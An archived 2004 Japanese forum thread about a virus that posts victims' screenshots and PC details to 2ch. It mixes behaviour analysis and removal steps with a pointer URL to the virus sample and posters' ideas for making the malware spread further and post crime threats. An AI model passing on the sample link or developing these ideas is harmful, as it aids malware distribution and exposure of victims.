ブラクラ・ウイルス張るときは「ht」まで抜いてくれますかね
503:[名無し]さん(bin+cue).rar
04/09/22 22:21:36 l67SMSG4
アップローダに上げてるってことは普通に考えれば自己感染もアップローダ経由になるんじゃねーの
504:[名無し]さん(bin+cue).rar
04/09/22 22:24:38 F8v+LexZ
ウイルスだって解ってるURL貼るときは
htt://strawberry.web-sv.com/cgi/up/ia/up1360.zip
にしたほうがいいんじゃないの?
これなら大抵の専用ブラウザでもリンクできないでしょ?
505:[名無し]さん(bin+cue).rar
04/09/22 22:24:43 Pp/pgXRx
盛り上がらないニュ速板。
506:[名無し]さん(bin+cue).rar
04/09/22 22:26:57 rr+OCUUx
うpろだ死んだ
507:[名無し]さん(bin+cue).rar
04/09/22 22:28:02 1t6CyIj6
うpろだが重すぎて画像見づらいから盛り上がらん。
キンタマみたいにファイル詰め合わせ(ウィルスつき)だったら
2次感染もあってすごいことになるのに
508:[名無し]さん(bin+cue).rar
04/09/22 22:29:57 Sxm2sX2b
>>492
>>469の中身は↓だった。同じ内容の.exeファイルが三つ。
(写真集)(ロリータ)水原友里.exe
(写真集)(ロリータ)相田香奈子.exe
コピー~(写真集)(ロリータ)河瀬菜美.exe
509:[名無し]さん(bin+cue).rar
04/09/22 22:35:19 0Y8OIFWt
被害者どれくらいでてんだろ?
510:[名無し]さん(bin+cue).rar
04/09/22 22:36:25 04BG488z
どうでもいい
511:[名無し]さん(bin+cue).rar
04/09/22 22:36:28 MORRrkle
まぁ、普通にnyにも流れるだろうな、ってか既に流れてるかもしれんね。
まぁ、感染方法は古典的だけど、webに晒すと言うのが斬新かな。
512:[名無し]さん(bin+cue).rar
04/09/22 22:36:31 31YwwZCa
URLリンク(www2j.biglobe.ne.jp)
513:[名無し]さん(bin+cue).rar
04/09/22 22:37:02 mrLzYwy8
ウヒョー新型キタ━━(゚∀゚)━━!!!!!!
オラなんだかワクワクしてきたぞ!
画像うpだけじゃなくて感染機能もあればいいのだがな
ウイルス本体と軽いファイル(kakikomi.txtとかお気に入りとか)をアーカイブしたモノもアプロダに上げてたらマジ大騒ぎになると思うんだが
ろだのアドレスを無作為に書き込んだり2ch外にも書き込んだり……
514:[名無し]さん(bin+cue).rar
04/09/22 22:37:23 6gk9JVQ6
これ自体はたいしたことなさそうだが
とんでもなくエグイ亜種が出てきそうな気がする。
515:[名無し]さん(bin+cue).rar
04/09/22 22:38:46 0Y8OIFWt
これ逮捕可能じゃないの?
516:[名無し]さん(bin+cue).rar
04/09/22 22:39:09 cHFtlyXw
クリップボードがかわいく見えてきた
517:[名無し]さん(bin+cue).rar
04/09/22 22:39:18 9PF+//Fy
確かにkakikomi.txt晒すのが一番凶悪だな
518:[名無し]さん(bin+cue).rar
04/09/22 22:39:49 mrLzYwy8
“晒す”という斬新な被害の概念を作り出したキンタマに敬意を表する。
519:[名無し]さん(bin+cue).rar
04/09/22 22:42:12 mrLzYwy8
ろだが落ちたらうp先を変えたりはしないのかなぁ。
自分で新しいろだを探してうpするようにできてたら最強だけど……
520:[名無し]さん(bin+cue).rar
04/09/22 22:43:36 6gk9JVQ6
ふと思ったんだがこいつを海外に流したら気づきようがないんじゃない?
521:[名無し]さん(bin+cue).rar
04/09/22 22:46:26 wdHMs2ep
>>520
実害もたいして無いような
522:[名無し]さん(bin+cue).rar
04/09/22 22:47:27 F+6I/erB
というか外人のを見ても面白くない
523:469
04/09/22 22:52:12 yMfO9itd
本スレで、俺の書き込みのコピペがされてる模様・・・・_| ̄|○
本スレから、さらに感染拡大か(´・ω・`)ショボーン
524:[名無し]さん(bin+cue).rar
04/09/22 22:53:08 zasm0Yrz
>>515
捜査協力しないと苺がやられるだろうね。
だから、結構なところまでは絞れると思う。
でも、ネカフェとかからのアップだったら、操作はそこまで。
525:[名無し]さん(bin+cue).rar
04/09/22 22:53:42 mrLzYwy8
国外にまで出るとさすがに面倒なことになる悪寒。
国内でやって欲しいな。
あーでも2ch以外でもやってくれると被害者続出して社会問題化……したりはしないか。
526:[名無し]さん(bin+cue).rar
04/09/22 22:54:26 6gk9JVQ6
まぁ落ちたきたexeを実行するやつはそんなにいないでしょ
527:[名無し]さん(bin+cue).rar
04/09/22 22:54:55 RSK53XEO
最近のネカフェって監視カメラ置いてるから、仮に個室だったとしても
通路を移動する時に激写されてる悪寒。
528:[名無し]さん(bin+cue).rar
04/09/22 22:56:21 5TIb9wHl
フォルダ偽装の.exeだから
踏む奴はそれなりに居る予感
つかダミースレの勢い凄いな
529:[名無し]さん(bin+cue).rar
04/09/22 22:57:43 zasm0Yrz
2ちゃんってこういうとき、該当の板って絶対止めないよな。
とくにうpろだとか。
530:[名無し]さん(bin+cue).rar
04/09/22 22:58:45 iDhsW6nH
さぁ盛り上がってまいりました(・∀・)
531:[名無し]さん(bin+cue).rar
04/09/22 22:59:15 cHFtlyXw
どうせTorとか経由してうpしてんだろ。特定不能
532:[名無し]さん(bin+cue).rar
04/09/22 23:01:53 lWXOwM8A
誰か今回の件まとめてくれ。
533:[名無し]さん(bin+cue).rar
04/09/22 23:05:11 aJET+JT9
また新種かい、nyと洒落に流れてるんか
534:[名無し]さん(bin+cue).rar
04/09/22 23:05:32 VPSOXf5B
>526
nyやってる奴ならアイコン偽装は常識だが
nyやってなければ普通に引っかかると思われ
拡張子を表示してない・詳細表示もしない香具師もいっぱい居るだろうから
535:[名無し]さん(bin+cue).rar
04/09/22 23:06:54 zasm0Yrz
>>534
Explorerのデフォルトが、表示しないようになってるからね。
536:[名無し]さん(bin+cue).rar
04/09/22 23:07:25 iDhsW6nH
これはメル欄に回数も申告してくれるのか
537:[名無し]さん(bin+cue).rar
04/09/22 23:09:56 baZulnI6
逮捕可能らしいよちょっくら被害届けだしてウイルスの作者をどんな奴かみて見ようじゃないか
面白くなってきたw
538:[名無し]さん(bin+cue).rar
04/09/22 23:10:58 6gk9JVQ6
>>534
うpロダから落としたファイルでしょ?
信用のできなさはnyとそう変らんと思うがねぇ。
539:[名無し]さん(bin+cue).rar
04/09/22 23:13:03 mrLzYwy8
こいつの応用で勝手に犯罪予告カキコとか、ある主義主張を書き込みまくるとかできそうだな。
540:[名無し]さん(bin+cue).rar
04/09/22 23:14:32 iDhsW6nH
>>539
!!!!!!
541:[名無し]さん(bin+cue).rar
04/09/22 23:16:31 FFBqPrVy
犯罪予告カキコしたら作者100㌫捕まるよ
542:[名無し]さん(bin+cue).rar
04/09/22 23:17:55 zasm0Yrz
>>541
追尾できればね。
543:[名無し]さん(bin+cue).rar
04/09/22 23:17:56 baZulnI6
>>541
っていうか色んな所から命を狙われると思われ
今でさえヤバイかもしれんのに
544:[名無し]さん(bin+cue).rar
04/09/22 23:17:57 oAAlAMOi
nyみたいに特定のp2pにしか流通するんじゃなくて、Web晒しともなると
アンチウイルスのベンダー各社の対応も早いと思うけど、そもそも
アンチウイルスソフト常駐させずにヤバげなの落とす香具師も多いしな~
545:[名無し]さん(bin+cue).rar
04/09/22 23:18:03 cHFtlyXw
被害内容:エロゲやってる所を晒されました。。。
546:[名無し]さん(bin+cue).rar
04/09/22 23:18:52 ExLnvAck
ここ見てるやつ晒されてるな
547:[名無し]さん(bin+cue).rar
04/09/22 23:20:22 FFBqPrVy
現時点でもだれかが訴えれば捕まるか
548:[名無し]さん(bin+cue).rar
04/09/22 23:20:51 EQvNm7YP
>>538
exeだがフォルダアイコンにされてるんで
平気で開く奴はいるだろう
549:[名無し]さん(bin+cue).rar
04/09/22 23:21:03 iDhsW6nH
こいつ自身にny上での拡散機能は備わってるわけ?
ぬるぽーすは確か繁殖はしなかったからあまり流行らなかったんだよな
550:[名無し]さん(bin+cue).rar
04/09/22 23:21:15 F8v+LexZ
三三三三三三三 ( |
三三三三三 )) |
三三三三)ミ,((^^彡ミ彡 / 貴様ッ!
三三三三 ((三三 6)彡//\
三三三∩三ミl三三 /ミ彡 /) | 見ているなッ!
三三三|彡ミ三l三 / \ / /、 |
三三三ヽ_)二 | ̄ ノ / ミl :l、\
三 /二 /ミ ‐v-― 4/ )ミ/ / /ヽ ̄ ̄ ̄ ̄
三/  ̄ /ミ lミ (_/ 三`4`4`4
551:[名無し]さん(bin+cue).rar
04/09/22 23:22:16 baZulnI6
最初にupロダにウイルスあげた奴がnyとかのウイルス作者にも繋がってると思うよ
感染した人の誰か被害届け出したら?
552:[名無し]さん(bin+cue).rar
04/09/22 23:22:24 iDhsW6nH
んで
作者捕まえられるってのはどうしてだい(・∀・)?
553:[名無し]さん(bin+cue).rar
04/09/22 23:23:43 cHFtlyXw
今頃苺のログが教徒不敬に渡っている模様
554:[名無し]さん(bin+cue).rar
04/09/22 23:24:31 VPSOXf5B
>538
例えばろり画像うpったとか言ってリンク貼れば
躊躇も無くフォルダアイコンクリックする奴続出でかなりの被害が出る
アンチウィルスは対応してないから
zipをスキャンかけた所で何もでなけりゃ普通にクリックしちゃうんだろうな
そもそもnyやってなければアイコン偽装なんて考え付かないだろう
キンタマでた当時もアイコン偽装やら .exeやらで感染者多数だったし
555:[名無し]さん(bin+cue).rar
04/09/22 23:24:45 6gk9JVQ6
スクリーンショットをとるタイミングはランダムなの?
556:[名無し]さん(bin+cue).rar
04/09/22 23:25:20 zasm0Yrz
見たところ、掲示板へのメッセージポストには、
厨房板もリストに入っているんだよな。
557:[名無し]さん(bin+cue).rar
04/09/22 23:25:36 6gk9JVQ6
>>554
なるほどね。
558:[名無し]さん(bin+cue).rar
04/09/22 23:27:49 iDhsW6nH
URLリンク(maichy.s1.x-beat.com)
ヾ( ゚∀゚)ノ゛ウヒョー
漏れの書き込み写ってるよー
おまい感染してるぞm9(・∀・)ビシッ!!
お気に入りさらされて恥ずかしいやつめ( ´∀`)σ)∀`)
559:[名無し]さん(bin+cue).rar
04/09/22 23:28:06 mrLzYwy8
問題はろだが負荷に耐えられない点だ。
nyはそれこそP2Pだから余裕で負荷分散できてたけど、今回のは2chあぷろだに完全依存してるのかな?
560:[名無し]さん(bin+cue).rar
04/09/22 23:29:25 mrLzYwy8
やべーワクワクして眠れないよ
昨日2時間しか寝てないってのに……
561:[名無し]さん(bin+cue).rar
04/09/22 23:30:21 cHFtlyXw
>>559
バイナリ見たら依存してるっぽい。
作者はそんなに流行らない事を想定して作ったんだろう。
にしても言語がDelphiって、村長..あqwせdrftgyふじこlp
562:[名無し]さん(bin+cue).rar
04/09/22 23:31:49 l6yZ90q2
>463 :[名無し]さん(bin+cue).rar [sage] :04/09/22 20:00:51 ID:6gk9JVQ6
>そろそろ面白いことになるから覚悟しとけよおまいら
お前が面白いことになるかもしれないから覚悟しとけよ。
563:[名無し]さん(bin+cue).rar
04/09/22 23:32:34 aJET+JT9
>>558 俺の書き込みも入ってる で
誰かバスターとか先生に検体出した?
564:[名無し]さん(bin+cue).rar
04/09/22 23:32:34 GLBs3gje
まさか村chなんて事はありsかhbしあいううぇうhじお
565:[名無し]さん(bin+cue).rar
04/09/22 23:33:22 F2ovsLb+
小島さん見てる?
566:[名無し]さん(bin+cue).rar
04/09/22 23:33:30 kAgi+UO1
342 名前:分析師はいずこにw(ついでに・・・)[sage] 投稿日:04/09/22(水) 22:50:54
ラウンジの偉大な鑑定師様に感謝
スレリンク(entrance板:529番)
スレリンク(entrance板:738番)
通称:苺きんたま
形態:(写真集) (ロリータ)~みたいなフォルダ(実際にはフォルダのアイコンのexe)
症状:exeを実行するとデスクトップの画像をキャップし
2ちゃんのスレに自動的に書き込む
その他の症状は不明
修復方法:HKEY_CURRENT_USER Software\Microsoft\Windows\CurrentVersion\Run
のshellsystem.exeを削除
HijackThisの04にも現れると思われるが現時点では不明
O4 - HKLM\..\Run: [???] C:\WINDOWS\SYSTEM\shellsystem.exe
O4 - HKLM\..\Run: [???] C:\WINDOWS\shellsystem.exe
注意:WindowsフォルダはOSなどでは改変する
???は現時点では不明
【分析】HijackThis【研究】
スレリンク(sec板)
567:[名無し]さん(bin+cue).rar
04/09/22 23:34:07 cHFtlyXw
まさか村長、Shareにウィルス流されてからってうわなにをするやめrqwせdrftgyふじこlp;@
568:[名無し]さん(bin+cue).rar
04/09/22 23:36:12 mrLzYwy8
ということで、ろだ分散が次回作への課題ですな>作者or改良者
自分で新しいろだを見つけてくるようにできれば最高だけど。
あと感染者が多いと投稿するスレが一瞬で埋まるな。投稿先の分散も(ry
あとは節穴と書き込みログうpすれば最凶
人生終わる香具師が続出の悪寒
569:[名無し]さん(bin+cue).rar
04/09/22 23:36:34 oAAlAMOi
Shareやってないから、村chとか村長とか言われてもわかんないよ~。
570:[名無し]さん(bin+cue).rar
04/09/22 23:37:27 6gk9JVQ6
>>562
558はおまえのスクリーンだよって言ってるのかと思ってめっさあせったw
なんかほんとに面白いことになってきたね。
今夜はねれねぇや!!
571:[名無し]さん(bin+cue).rar
04/09/22 23:37:56 cHFtlyXw
んじゃ新ウィルス名は End of life でよろ
572:[名無し]さん(bin+cue).rar
04/09/22 23:38:27 ikOHa1pk
別に捕まえなくても個人がそいつ訴えればいい
作者の身元判明したらもしかしたら色んな奴から訴えられるかもしれない。
感染した奴の中に「凄い恨み」を持っている奴も多数いるかもしれない
どんどんやればやるほど被害者が増えるわけで本気になるんじゃないかな
573:[名無し]さん(bin+cue).rar
04/09/22 23:39:38 0Y8OIFWt
>>463って犯人か?
574:[名無し]さん(bin+cue).rar
04/09/22 23:40:01 cHFtlyXw
まぁどっちにしろ、kakikomi.txtを出力しない設定にしてる俺は神って事で
575:[名無し]さん(bin+cue).rar
04/09/22 23:40:10 1LUqJ/M+
フォルダのアイコン変えて無いやつっているのかな
576:[名無し]さん(bin+cue).rar
04/09/22 23:40:14 mrLzYwy8
しかしこれ最強の2getウイルスだなw
殆どのダミースレで2getしてやがる
577:[名無し]さん(bin+cue).rar
04/09/22 23:40:47 L3WMITSN
ロダに画像うpは斬新だけど他は既存と大差ないよなぁ。
感染方法も既存パターンだから大騒ぎするほどじゃないだろ・・・。
578:[名無し]さん(bin+cue).rar
04/09/22 23:41:32 z98GE62u
捜査資料作成中のキャプ来ないかなあw
579:[名無し]さん(bin+cue).rar
04/09/22 23:42:16 iDhsW6nH
>>577
面白いからいいんだよ
しかし俺もkakikomi.txt趣味で出力してるけど
もう止めようかなぁw
580:[名無し]さん(bin+cue).rar
04/09/22 23:42:28 mrLzYwy8
>>577
問題はP2Pという閉じた環境から外に出てきてしまった事だ。
これまではnyネットワーク内で済んでたがこれからは……
581:[名無し]さん(bin+cue).rar
04/09/22 23:42:34 6gk9JVQ6
>>573
たまたま。ちょっと煽ってみたら実現しました
582:[名無し]さん(bin+cue).rar
04/09/22 23:43:01 cHFtlyXw
ロダに画像うpって別に斬新じゃないと思うが・・・
583:[名無し]さん(bin+cue).rar
04/09/22 23:44:08 MmcFLfnI
SP2スレでも書いたけど、セキュリティの最大の欠陥はユーザなんだよな。
Winが穴だらけなのは確かだが、それ以上に・・・
584:[名無し]さん(bin+cue).rar
04/09/22 23:45:03 cHFtlyXw
スレリンク(operate板:85番)
なんでやたら台湾からShareしてる奴が多いんだよ
585:[名無し]さん(bin+cue).rar
04/09/22 23:45:25 6gk9JVQ6
本スレではもう飽きがきてるみたいだな。
586:[名無し]さん(bin+cue).rar
04/09/22 23:46:37 1LUqJ/M+
スクショ取るだけじゃ決定的な瞬間は撮りづらいなあ
デスクトップうpきぼんぬ
587:[名無し]さん(bin+cue).rar
04/09/22 23:48:08 cHFtlyXw
システム稼動に必要以外のプロセスkillして、その瞬間にスクショとかあqwせdrftgyふじこlp;@
588:[名無し]さん(bin+cue).rar
04/09/22 23:48:19 mrLzYwy8
画像見れないから飽きが来るんだろうな。
アプロダ落ちたらそれまで。
589:[名無し]さん(bin+cue).rar
04/09/22 23:50:58 Pp/pgXRx
キムタマはデスクトップ上のフォルダも一緒に流したじゃん?
('A`) ビミョー
590:[名無し]さん(bin+cue).rar
04/09/22 23:52:28 zasm0Yrz
Monazilla/1.00 (toolname/ver)Maropa2ch
停止しました
私は苺で違法ダウンロードばかりしている犯罪者です
shellsystem.exe open
%d回目
大人の時間
半角二次元
アップローダ
雑談系2
厨房!
ってあたりかな。
厨房のスレッドにもやるつもりだったけどやめたのかな?
あるいは、半角板にアップローダってのが含まれるスレッドが無くなったら
厨房板の一番上のスレッドにpostするのか。
591:[名無し]さん(bin+cue).rar
04/09/22 23:52:43 1LUqJ/M+
本スレってどこ?
592:[名無し]さん(bin+cue).rar
04/09/22 23:52:47 mrLzYwy8
あとアイドル的存在がいないって言うのもあるな
naoはまさに神だった……
593:[名無し]さん(bin+cue).rar
04/09/22 23:52:56 6gk9JVQ6
これさぁ。ユーザー名をムカつく奴のフルネームにして。
わざと感染しエロゲー画像を流しまくったら・・・・・こ、こわ!!
594:[名無し]さん(bin+cue).rar
04/09/22 23:53:41 6gk9JVQ6
ごめんあげてもた
595:[名無し]さん(bin+cue).rar
04/09/22 23:54:07 iDhsW6nH
うpろだを可能な限りウイルスに書いといて
実行時にはランダムに選ぶようにすればおkか?
それで軽くなればjpg以外の小さなものもうpできるようになるな
596:[名無し]さん(bin+cue).rar
04/09/22 23:56:55 Ig4m3Rvj
晒されたのを見て楽しむ側にお手軽感がないな
キンタマとキーワード設定するだけで寝てる間にたまるnyとは違うね
597:[名無し]さん(bin+cue).rar
04/09/22 23:58:26 mrLzYwy8
節穴があれば画像が見れなくても多少は楽しめたんだがなー
598:[名無し]さん(bin+cue).rar
04/09/22 23:59:31 Nw+F3dT8
鯖側に対策されたらすぐ終わりじゃん
P2Pの利点を全く活かしてないな
599:[名無し]さん(bin+cue).rar
04/09/23 00:02:23 IFT2b9V5
名前リネームするつもり駄思わずダブルクリックしちまった(笑)
>shellsystem.exe(笑)
600:[名無し]さん(bin+cue).rar
04/09/23 00:02:49 cDvdfQLH
(笑?(汗
601:[名無し]さん(bin+cue).rar
04/09/23 00:03:43 avdWvEQz
>>599
そのまま飼えw
602:[名無し]さん(bin+cue).rar
04/09/23 00:03:45 mmGHQUsE
俺は正直このくらいでいい。
観てるほうは面白いし晒された方はちょっと恥ずかしいけど
そんなにダメージでかくない。あとは画像が見れれば最強なんだが。
603:[名無し]さん(bin+cue).rar
04/09/23 00:05:06 qxy2PN5p
URLリンク(www.zakzak.co.jp)
2004_09/t2004090121.html
このアドレスだけ書き込めないんだけどなぜ?
(改行してあります)
604:[名無し]さん(bin+cue).rar
04/09/23 00:05:12 uOSTlOvj
344 名前:分析師はいずこにw(ついでに・・・)[sage] 投稿日:04/09/23(木) 00:01:32
苺きんたまに感染してみたぞーーーw
俺が実行したのは「(写真集) (ロリータ) 水原友里.exe」だwww
ノートン先生とBitDefenderおよびFWは全てスルーされたw
もちろんスパイウェア駆除製品も・・・おっとスルーだw
ちなみネット切断した状態で実験したから俺の画像は多分ないぞwww
感染するとプロセスが2つ走りどちらか一つを消しても
片方を復活させる仕組みでプロセスから終了は不可
感染するとPCのデスクトップのスクリーンが取られ晒され
【うpろだ】アップローダー案内所【アプロダ】板に以下の書き込みがされる
名前:私は苺で違法ダウンロードばかりしている犯罪者です[ここに晒るされた時の初回のID:1回目]
私は苺で違法ダウンロードばかりしている犯罪者です
【コンピュータ名】コンピュータ名が入る
【ユーザー名】ユザー名が入る(例:Owner)
【今こんな事やってます】2ちゃんロダのアドレスが晒され先が貼られる
取った処置
1:まずPCの電源を切りセーフモードで起動してファイルのC:\WINDOWS\shellsystem.exeを削除
2:元になった「(写真集) (ロリータ) 水原友里.exe」も一応削除
3:普通に再起動してHijackThisでScan以下のエントリーをFixで削除
O4 - HKLM\..\Run: [shellsystem.exe] C:\WINDOWS\shellsystem.exe
3:のHijackThisの処理で以下が消えてるのも確認できた
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
name:shellsystem.exe data:shellsystem.exe
若干の祭り状態だからこれからの患者が予想されるw
とりあえずこれで解決めでたしめでたしwww
605:[名無し]さん(bin+cue).rar
04/09/23 00:06:10 ERKjq774
勇者乙!
606:[名無し]さん(bin+cue).rar
04/09/23 00:06:38 cDvdfQLH
たかがこんなウィルスでマルチプロセスにするとは。
なんか村長の気がしないでもない。
607:[名無し]さん(bin+cue).rar
04/09/23 00:08:12 cDvdfQLH
つーかFWがスルーしたってのはただ単に設定ミス・・
608:[名無し]さん(bin+cue).rar
04/09/23 00:09:20 twtSBewN
ユーザー名の変更
URLリンク(www.windowsfan.com)
コンピュータ名の変更
URLリンク(www.windowsfan.com)
本名を吊るされないために
609:[名無し]さん(bin+cue).rar
04/09/23 00:09:28 mgVunU57
>>599
デスクトップをグロ画像に汁
>>604
> 感染するとプロセスが2つ走りどちらか一つを消しても
> 片方を復活させる仕組みでプロセスから終了は不可
うをすげー。
珍しくもないのかも知れないけど、この発想はいいな。
610:[名無し]さん(bin+cue).rar
04/09/23 00:09:58 mmGHQUsE
>>604
作者は力入れるとこ間違ってる気がする。
611:[名無し]さん(bin+cue).rar
04/09/23 00:11:38 avdWvEQz
>>609
レジストリも頻繁に書き直してれば結構やばいな
612:[名無し]さん(bin+cue).rar
04/09/23 00:13:41 JkmDFIbz
>>611
レジストリも書き直ししてるよ 猛烈な速さで
613:[名無し]さん(bin+cue).rar
04/09/23 00:15:03 62NRg8JO
苺キンタマか
614:[名無し]さん(bin+cue).rar
04/09/23 00:15:39 IFT2b9V5
マルチプロセスだね(笑)
一個殺しただけじゃ排除できない。
基本的には
1)%system%\shellsystem.exeを作成する(自己複製)
2)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
にshellsystem.exeを追加
3)うpろだのクッキーを取得し、PrintScreenしてup用のデータを作る
4)レジストリからマシン名とユーザ名を取得
5)掲示板用のデータ作成
6)指定キーワードでマッチした掲示板上のスレッドにpost
って感じみたいね。感染してみたところ(笑)
615:[名無し]さん(bin+cue).rar
04/09/23 00:16:48 q17x7W8p
すげぇな…
ちょっと感心してしまった
616:[名無し]さん(bin+cue).rar
04/09/23 00:18:30 cDvdfQLH
村長…
617:[名無し]さん(bin+cue).rar
04/09/23 00:20:28 IFT2b9V5
>>590
ちなみに、これが2ちゃんの掲示板上へpostするときの条件。
618:[名無し]さん(bin+cue).rar
04/09/23 00:20:43 +TwoeBBt
気合入った作りだな
ただウィルスとしては何か間違ってる気がする
619:[名無し]さん(bin+cue).rar
04/09/23 00:24:10 yEjCkAsP
祭り会場どこ?
参加したい
620:[名無し]さん(bin+cue).rar
04/09/23 00:24:48 iavrH4rm
XP限定?
621:[名無し]さん(bin+cue).rar
04/09/23 00:26:02 IFT2b9V5
98では試してないけど、2000でも感染する。
内部的には特にOSに依存しているように見えないよ。
622:[名無し]さん(bin+cue).rar
04/09/23 00:26:21 62NRg8JO
>>619 ここらしいよ 【うpろだ】アップローダー案内所13【きんたま】
スレリンク(ascii2d板)
苺キンタ祭
623:[名無し]さん(bin+cue).rar
04/09/23 00:26:43 Omvkoikg
>>619
スレリンク(ascii2d板)
624:[名無し]さん(bin+cue).rar
04/09/23 00:26:52 8EfG+J1e
jpgもヤヴァイらしいぞ!!!!
625:[名無し]さん(bin+cue).rar
04/09/23 00:27:05 IFT2b9V5
でも、プロセス殺せないって言い過ぎだね、祭りスレ。
プロセスツリーを殺せば両方死ぬよ。
626:[名無し]さん(bin+cue).rar
04/09/23 00:28:03 yEjCkAsP
>>622,623
thx
627:[名無し]さん(bin+cue).rar
04/09/23 00:29:09 Q+leSqll
>>563
ノートン先生には出しておいた。
628:[名無し]さん(bin+cue).rar
04/09/23 00:29:14 neSmPO5T
晒されたjpg見てたら、メーラが勝手に起動したぞ、オイ
629:[名無し]さん(bin+cue).rar
04/09/23 00:29:36 mmGHQUsE
おいおまいら関祭りには参加しなかったのか?
630:[名無し]さん(bin+cue).rar
04/09/23 00:31:11 zW53Q5jb
>>629
してるよ。チャットだろ
631:[名無し]さん(bin+cue).rar
04/09/23 00:32:10 XTKk22G2
>>630
お前可愛いな
632:[名無し]さん(bin+cue).rar
04/09/23 00:33:53 WmXl7kiF
原口祭りの次は関祭りか
633:[名無し]さん(bin+cue).rar
04/09/23 00:35:56 IE8I1c5s
原口とか関って誰?
634:[名無し]さん(bin+cue).rar
04/09/23 00:35:59 mmGHQUsE
tesu
635:[名無し]さん(bin+cue).rar
04/09/23 00:39:25 sH8yfJe2
セーフモードで起動しなくても駆除できるよ。
使うものはコマンドプロンプトとレジストリエディタ。
1. 感染したらまず、コマンドプロンプトを開いてtasklistを実行
2. その中に以下のいずれかのファイル名があることを確認
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー ~ (写真集) (ロリータ) 河瀬菜美.exe
shellsystem.exe
3. あるのを確認したら下記のコマンドを入力
taskkill /f /im "ウイルスのファイル名" /t
4. 「成功」と出たら次は下記ウイルスファイルの削除を行う
%SystemRoot%\shellsystem.exe
解凍先にあるウイルスファイル
5. 削除が完了したらレジストリエディタ(regedit)を開いて
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
を削除する
以上で完了かな。
636:[名無し]さん(bin+cue).rar
04/09/23 00:39:27 EpVCAi7y
感染能力ないんだろ?
637:[名無し]さん(bin+cue).rar
04/09/23 00:39:46 mmGHQUsE
てす
638:[名無し]さん(bin+cue).rar
04/09/23 00:41:09 62NRg8JO
>>627 ID変わってるけど㌧くす
SS見たいのは山々だけど、ろだが重くて見れんよ(´・ω・`)ショボーン
というかつい最近あった脆弱性を突いて、晒されたjpgを見ただけで感染したら
恐ろしいかも もともと感染しちゃった人は偽装exeを知らなかったんだね…
639:[名無し]さん(bin+cue).rar
04/09/23 00:42:44 mmGHQUsE
ニュー速で規制されたorz
90秒ってなげーよ・・・
640:[名無し]さん(bin+cue).rar
04/09/23 00:43:48 Xufqlvin
えーと、nyはPCに入れてないんですが、感染してしまいました。
上で書かれた方法で徹底的に除去しましたが、再インストールの必要性はありますか?
641:感染でパニクってる者達へ
04/09/23 00:44:13 ERKjq774
以上
スレリンク(download板)
の
>>635
さんの書き込みです
成功したら彼に感謝を
642:[名無し]さん(bin+cue).rar
04/09/23 00:44:36 avdWvEQz
>>640
人生を再インストー(ry
643:[名無し]さん(bin+cue).rar
04/09/23 00:45:00 Rr2p3mqe
キンタマのやつ、システムの復元やったらウィンドゥズのトコにあったファイル消えたけど
これで大丈夫?
644:[名無し]さん(bin+cue).rar
04/09/23 00:45:19 IFT2b9V5
vbsあたりで除去パッチ簡単に作れそうだね。
645:[名無し]さん(bin+cue).rar
04/09/23 00:46:08 Xufqlvin
>>642
なるほど、いっそこの際元から断つ(絶つ)、と。
人生のアドバイスありがとうございます。
646:[名無し]さん(bin+cue).rar
04/09/23 00:46:11 IE8I1c5s
>>643
ドゥイジョウブドゥス
647:[名無し]さん(bin+cue).rar
04/09/23 00:46:36 R1XdgUSO
こどもホタル祭りワロタ
648:[名無し]さん(bin+cue).rar
04/09/23 00:47:05 Rr2p3mqe
>>646
サンクス
649:[名無し]さん(bin+cue).rar
04/09/23 00:49:23 4MBKm6hw
USBカメラでスクリーンショット機能はどうした?
650:[名無し]さん(bin+cue).rar
04/09/23 00:49:45 o5J4yEHm
>647
なにそれ?
651:[名無し]さん(bin+cue).rar
04/09/23 00:53:55 ZTCe7RBf
>>635
tasklistってXPhomeだとなに?
652:[名無し]さん(bin+cue).rar
04/09/23 00:55:00 Q9B0LMRA
2ch側がUserAgentではじくようにするのが手っ取り早い?
653:[名無し]さん(bin+cue).rar
04/09/23 00:57:19 R1XdgUSO
>>650
【うpろだ】アップローダー案内所13【きんたま】
スレリンク(ascii2d板:617番)
654:[名無し]さん(bin+cue).rar
04/09/23 00:58:51 o5J4yEHm
>653
わかった。どうも。
655:[名無し]さん(bin+cue).rar
04/09/23 00:59:22 cDvdfQLH
にしてもDelphiやらPerlやら、糞言語ばかりで作るな・・・ウィルス
656:[名無し]さん(bin+cue).rar
04/09/23 01:05:43 sH8yfJe2
>>635はXP Pro前提で書いてます。
Homeやその他のOSは>>604あたりで。
657:[名無し]さん(bin+cue).rar
04/09/23 01:06:19 avdWvEQz
>>656
やっぱりpro限定だったか
658:[名無し]さん(bin+cue).rar
04/09/23 01:06:22 +1rdgFwz
感染するやつは馬鹿
659:[名無し]さん(bin+cue).rar
04/09/23 01:07:11 IFT2b9V5
>>652
monadzillaのブラウザの何かに偽装してるんじゃないかと思うよ。
660:[名無し]さん(bin+cue).rar
04/09/23 01:08:11 cDvdfQLH
苺キンタマのUSER_AGENTはmonazilla.orgの資料室そのままでしたが。
661:[名無し]さん(bin+cue).rar
04/09/23 01:08:22 IFT2b9V5
taskkillあたりは、買ったOSのsupportディレクトリにあるsupporttoolsにあるんじゃないかと。
662:[名無し]さん(bin+cue).rar
04/09/23 01:10:41 mmGHQUsE
しかし久々にflashget使ったよw
663:[名無し]さん(bin+cue).rar
04/09/23 01:13:14 dsk7MRPS
一番簡単な削除方法は>>643って事?
664:[名無し]さん(bin+cue).rar
04/09/23 01:13:41 IE8I1c5s
俺も久々にIrvine使ったw
665:[名無し]さん(bin+cue).rar
04/09/23 01:15:05 Q9B0LMRA
Monazilla/1.00 (toolname/ver)Maropa2chをはじけば
666:[名無し]さん(bin+cue).rar
04/09/23 01:27:08 Zv59j045
しかしキンタマ関係のVirus作る奴はいつも笑わしてくれる
667:[名無し]さん(bin+cue).rar
04/09/23 01:35:02 ntwmMQhY
俺フォルダアイコンデフォのままなんだがこんなの踏む奴いるのか?
668:[名無し]さん(bin+cue).rar
04/09/23 01:35:42 mmGHQUsE
もううpはやんだの?
669:[名無し]さん(bin+cue).rar
04/09/23 01:36:08 yEjCkAsP
.folderどころか.exeを踏む奴がイパーイ
>>667
一応変えといたら?
